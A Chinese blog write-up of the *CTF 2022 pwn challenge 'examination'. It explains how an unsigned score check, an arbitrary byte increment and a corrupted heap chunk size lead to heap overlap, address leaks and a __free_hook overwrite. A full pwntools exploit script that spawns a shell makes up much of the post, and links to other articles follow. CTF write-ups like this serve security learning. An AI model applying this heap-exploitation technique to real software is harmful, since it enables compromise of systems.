*CTF 2022 pwn examination

最新推荐文章于 2024-09-17 23:15:58 发布
最新推荐文章于 2024-09-17 23:15:58 发布
阅读量71 收藏
点赞数
文章标签: python 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62172019/article/details/132053684
版权

题目很简单就是阅读量有点大
在这里插入图片描述
当学生的分数>=90u的时候可以获得堆地址以及任意地址加一注意:是byte类型 以及比较的时候是无符号数比较所以负数的时候就可以实现
分数什么时候能为负数呢?
在这里插入图片描述
在给分函数有一个(qword_5080[i] + 24LL) == 1满足就能执行-=10操作
有时候执行一次不一定能到负数可以多执行几次
那怎么满足上面的条件呢?
在pray函数里面
在这里插入图片描述
评价函数里面将堆块的大小和堆块地址都存在堆上所以我们只需要利用上面的任意加一修改堆块大小就可以完成堆溢出

如图
在这里插入图片描述
任意加一修改大小
在这里插入图片描述
又因为堆块申请限制在0x400以下所以我们要稍微修改一下堆块的大小使其重叠方便泄露地址
在这里插入图片描述
之后继续利用堆溢出修改堆块地址为free_hook的地址就能完成任意写

完成getshell

from pwn import *
context(arch='amd64')
def gd():
 gdb.attach(p)
 pause()
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
p = process("./pwn")
def add(num):
 p.recvuntil(b'choice>> ')
 p.sendline(b'1')
 p.recvuntil(b'enter the number of questions: ')
 p.sendline(str(num).encode())
 p.recvline()
def edit(idx,size,data):
  p.recvuntil(b'choice>> ')
  p.sendline(b'3')
  p.recvuntil(b'which one? > ')
  p.sendline(str(idx).encode())
  if size != -1:
   p.recvuntil(b'please input the size of comment: ')
   p.sendline(str(size).encode())
   p.recvuntil(b'enter your comment:')
   p.send(data)
   print(p.recvline())
  else:
   p.recvuntil(b'enter your comment:')
   p.send(data) 
   print(p.recvline())
def free(idx):  
 p.recvuntil(b'choice>> ')
 p.sendline(b'4')
 p.recvuntil(b'which student id to choose?')
 p.sendline(str(idx).encode())
 print(p.recvline())   
def show():
 p.recvuntil(b'choice>> ')
 p.sendline(b'2')
def change_id(i):
 p.recvuntil(b'choice>> ')
 p.sendline(b'6')
 p.recvuntil(b'input your id: ')
 p.sendline(str(i).encode())
 print(p.recvline())
def change_role(r):
 p.recvuntil(b'choice>> ')
 p.sendline(b'5')
 p.recvuntil(b'role: <0.teacher/1.student>: ')
 p.sendline(str(r).encode())

def set_mode(size):
 p.recvuntil(b'choice>> ')
 p.sendline(b'4')
 p.recvuntil(b'enter your pray score: 0 to 100')
 p.sendline(str(size).encode())
def prey():
 p.recvuntil(b'choice>> ')
 p.sendline(b'3')
 print(p.recvline())
def give():
 p.recvuntil(b'choice>> ')
 p.sendline(b'2')
p.recvuntil(b'role: <0.teacher/1.student>: ') 
p.sendline(b'0')
add(1)
edit(0,0x20,b'a')
add(2)
add(3)
edit(2,0x400-1,b'a')
add(4)
change_role(1)
prey()
change_role(0)
give()
change_role(1)
show()
p.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(p.recv(14),16) - 0x2a0
p.recvuntil(b'add 1 to wherever you want! addr: ')
print(hex(heap_base))

p.send('{}'.format(heap_base + 0x2e0 + 2))
change_role(0)
edit(0,-1,b'a' * 0x28 + p64(0x31) + p64(0x350 + heap_base) + b'a' * 0x20 + p64(0x21) + b'a' * 0x8 + p64(0x370 + heap_base) + p64(0x20) + p64(0x461))
free(2)
change_role(1)
change_id(1)
prey()
show()
p.recvuntil(b'add 1 to wherever you want! addr: ')
p.send('{}'.format(heap_base + 0x2e0 + 2))
p.recvuntil(b'here is the review:')
p.recvline()
libc_base = u64(p.recv(6).ljust(8,b'\x00')) - 0x1ecb80 - 96
print(hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
sys_addr = libc_base + libc.sym['system']
change_role(0)
edit(0,-1,b'/bin/sh\x00' + b'a' * 0x20 + p64(0x31) + p64(0x350 + heap_base) + b'a' * 0x20 + p64(0x21) + b'a' * 0x8 + p64(free_hook) + p64(0x20) + p64(0x461))
edit(1,-1,p64(sys_addr))

gd()

p.interactive()

在这里插入图片描述

萌の鱼
关注
MTCTF2022-pwn
m0_51185908的博客
10-04 722
MTCTF2022-PWN
BUUCTF[*CTF2019]otaku解题过程复现(超详细)
weixin_67057449的博客
07-29 757
在学习过程中看了好几个人的解题过程,复现还是复现了好久,自己来写一篇详细一点的。
NepCTF2022
qq_53263789的博客
07-19 1251
nepctf2022 wp
NepCTF2022 WP
Pysnow's Blog
07-20 2302
NepCTFWriteUp
NepCTF 2022 Web
qq_43756333的博客
07-22 956
解密sqlmap目录下准备好的so文件,导出hex值,可以用mysql select load_file,也可以用010editor进行导出,我这直接用工具导了。并且注意到提交$query语句提交到后端执行的是multi_query函数,也就是支持多语句执行,因此,这里的考点为二次注入+堆叠注入。udf提权一般三个条件,plugin目录,有insert和delete权限,然后就是配置文件secure_file_priv为空。这里迷了一下,开始疑惑为啥五个问题要用6个占位,后来看了下init.sql。
[CTF]-NepCTF2022
Mr.木Mu
07-20 4704
扫目录有 下载得到源码 代码审计 发现这个 php 文件中有一个反序列化的函数,存在反序列化漏洞查找 方法 跟进 中的 方法, 可以看到这里的 和 均为可控的, 寻找可用的 方法 这里跟进 中的 方法, 这里的 和 均是可控的.跟进 方法, 和 均是可控的,不难看出可以利用该方法中的 方法来进行命令执行的利用.现在需要解决的就是命令执行的语句, 注意到上图中的代码 这里可以通过 中的类中变量来控制 从而达到命令执行的目的. Challenger 代码审计 利用 模板
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
*CTF 2023 Misc
07-30
**CTF 2023 Misc** CTF(Capture The Flag)是一种网络安全竞赛,参与者通过解谜、破解、分析和编程来解决各种信息安全问题。"Misc"通常代表混合类别,意味着这个CTF挑战包含了多种不同领域的知识,比如密码学、...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Tcl lnit error: Can’t find a usable init.tcl in the following directories 问题解决
梦想闹钟
09-15 458
实际研究后发现,其实py2exe已经把打包需要的lib放在dist文件夹下了,但是打包后的程序运行后却没有去lib下找,而是去找系统自带的环境变量里找,所以找不到。这个问题出现在我用py2exe打包了一个包含tkinter的图形化界面,在当前电脑上运行无问题,在移动到新电脑上后提示报错、getcwd用于获取当前工作目录绝对路径,在设置环境的变量的时候它用的是绝对路径-所以也导致了在当前电脑上能用而移动后不能用。解决方法是在你的程序里重新设置下环境变量,而且是用相对路径的形式。
[Python数据可视化]Plotly Express: 地图数据可视化的魅力
最新发布
William数据分析的博客
09-17 460
在数据分析和可视化的世界中,地图数据可视化是一个强大而直观的工具,它可以帮助我们更好地理解和解释地理数据。Python 的 Plotly Express 库提供了一个简单而强大的方式来创建各种地图。本文将通过一个简单的示例,展示如何使用 Plotly Express 来创建一个交互式的地图,并探讨其在地图数据可视化方面的应用。
Python世界:力扣29题两数相除算法实践
来知晓的博客
09-13 431
除法运算本质是减法,从理解原理到真正实现还是有距离,建议初步理解后,不参考任何代码,完全自己复现一遍,体会更深。注意提示:目的就是提醒越界问题:-2^31/-1=2&31,超过了整数表达范围。本问题来自于力扣29题,在做完大数相乘后,顺带也看下两数相除。将两数相除,要求不使用乘法、除法和 mod 运算符。给定两个整数,被除数。
JUC从实战到源码:中断机制与API实现
qq_43843951的博客
09-12 1166
在Java中,线程中断是一种机制,用于通知线程应该停止当前正在执行的任务。中断通常用于协同线程之间的合作,以便让线程在适当的时候终止其工作,尤其是在长时间运行的任务或阻塞操作中。通过学了多线程以及synchronized的相关知识,接下来就到了学习线程中断知识。
opencv学习:calcHist 函数绘制图像直方图及代码实现
mohanyelong的博客
09-13 1491
opencv学习:calcHist 函数绘制图像直方图及代码实现
面试真题 | web自动化关闭浏览器,quit()和close()的区别
NHB234567的博客
09-13 396
关闭所有的浏览器窗口,销毁driver操作,则需要使用的是quit方法;当打开了多个窗口,只想要关闭非最后一个窗口的时候,使用的是close方法。这些资料,对于【软件测试】的朋友来说应该是最全面最完整的备战仓库,这个仓库也陪伴上万个测试工程师们走过最艰难的路程,希望也能帮助到你!close():只关闭当前的浏览器标签页,如果当前浏览器标签页剩下最后一个,则所有标签页面退出。是否编写过对应浏览器退出的测试用例。quit():所有的浏览器窗口退出。关闭当前的标签页,其他窗口不退出。退出当前所有的窗口;
Python——俄罗斯方块
2302_81225694的博客
09-14 1432
这段代码使用了Pygame库来实现游戏的图形界面,通过键盘控制方块的移动和旋转。游戏循环不断更新方块的位置和网格状态,并绘制在屏幕上。在方块达到底部或无法继续移动时,判断是否有满行,并清除满行的方块。游戏会根据方块的状态和移动情况不断更新,直到无法继续下落为止,游戏结束。俄罗斯方块游戏是一款经典的益智游戏,通常使用编程语言Python来实现。请注意,这只是一个简单的示例,可能还有一些功能和优化方面的改进。您可以根据自己的需求进行修改和扩展。
文档内容识别系统源码分享
xuehaishijue的博客
09-17 1406
数据集信息展示在当今信息爆炸的时代,文档内容识别系统的有效性和准确性愈发重要。为了提升YOLOv8在文档内容识别任务中的表现,我们采用了名为“FULL 2”的数据集进行训练和评估。该数据集专为文档图像的多样性和复杂性而设计,涵盖了多种类别的文本元素,使其成为优化深度学习模型的理想选择。
2024.9.16 day 1 pytorch安装及环境配置
m0_58285219的博客
09-16 447
pytorch安装及环境配置
学习ctfpwn的网址
03-15
当涉及到学习CTF(Capture The Flag)和Pwn(漏洞利用)的时候,以下是一些常用的网址和资源推荐: 1. CTFtime:https://ctftime.org/ - CTFtime是一个CTF竞赛的信息平台,你可以在这里找到各种CTF比赛的信息、题目...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值